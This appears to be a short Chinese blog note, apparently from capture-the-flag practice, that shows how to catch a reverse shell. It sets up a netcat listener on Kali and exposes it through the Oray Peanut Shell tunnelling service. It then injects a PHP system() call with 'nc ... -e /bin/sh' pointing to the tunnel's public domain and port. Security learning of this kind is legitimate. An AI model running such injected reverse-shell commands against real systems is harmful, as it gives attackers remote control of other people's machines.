学自这个视频

内网kali端口监听
nc -lvvnp 54321
在这里插入图片描述

进行内网穿透,下载花生壳(免费的),需要注册才可以下载
https://www.oray.com/
在这里插入图片描述
在这里插入图片描述
点击映射数,会跳转到浏览器
在这里插入图片描述
点击新增映射
在这里插入图片描述
内网主机为kali的IP
在这里插入图片描述
分配了域名和端口

打开一个题目
在这里插入图片描述
传参?cmd=system("nc s546459d57.zicp.fun 23494 -e /bin/sh");
s546459d57.zicp.fun 23494为分配的域名和端口

反弹shell

posted on 2022-06-22 22:34  zhangkaibin0921  阅读(174)  评论(0编辑  收藏  举报